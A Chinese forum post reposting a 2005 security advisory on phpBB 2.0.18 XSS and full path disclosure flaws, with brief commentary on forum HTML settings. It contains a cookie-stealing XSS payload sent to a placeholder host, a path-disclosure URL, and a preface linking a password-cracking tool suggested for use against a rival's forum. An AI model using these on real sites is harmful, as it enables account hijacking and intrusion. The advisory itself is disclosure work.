phpBB论坛程序:遇见新问题
投稿:mdxy-dxy
phpBB 2.0.18 XSS and Full Path Disclosure
Details: SecurityAlert
还有一个是工具,单线程的, 也没有大用处,实在情敌开了个什么phpbb什么的也可以拿来跑密码
下载:http://ftpzhangxue.w205.100dns.com/tools/phpbb.rar
Topic : phpBB 2.0.18 XSS and Full Path Disclosure
SecurityAlert Id : 269
SecurityRisk : Low
Remote Exploit : Yes
Local Exploit : No
Exploit Given : Yes
Credit : Maksymilian Arciemowicz
Date : 17.12.2005
Affected Software : phpBB <= 2.0.18
Advisory Text :
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 16.12.2005
from securityreason.com TEAM
- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin boar
d package. phpBB has a user-friendly interface, simple and straightforward administration
panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL
, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community so
lution for all web sites.
Contact with author http://www.phpbb.com/about.php.
- --- 1. XSS ---
If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in profile "Always al
low HTML: YES" or are you Guest
that you can use this tags:
<B C=">" onmouseover="alert(’SecurityReason.Com’)" X="<B "> H E L O </B>
Exploit:
<B C=">" onmouseover="alert(document.location=’http://HOST/cookies?’+document.cookie)
" X="<B "> H A L O </B>
and have you cookies.
- --- 2. Full Path Disclosure ---
In file admin/admin_disallow.php is
- -25-31---
if( !empty($setmodules) )
{
$filename = basename(__FILE__);
$module[’Users’][’Disallow’] = append_sid($filename);
return;
}
- -25-31---
function append_sid() dosen’t exists. And if you have:
register_globals = On
display_errors = On
Try to go:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1
- -RESULT ERROR---
Fatal error: Call to undefined function: append_sid() in /www/2018/phpBB2/admin/admin_disa
llow.php on line 28
- -RESULT ERROR---
- --- 3. Greets ---
sp3x
- --- 4.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
securityreason.com TEAM
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)
iD8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D
/0u14EN2sQAh1Bwu0yvT48Q=
=lsL8
-----END PGP SIGNATURE-----
哦,对了, 最上面那个好象也许大概似乎我猜是这个意思:
个性签名:
您填写的个性签名自动附带在您的发表的文章底部。个性签名有512个字符的限制。
禁止HTML标签
允许风格标签
允许表情图标
找到可以“允许HTML标签”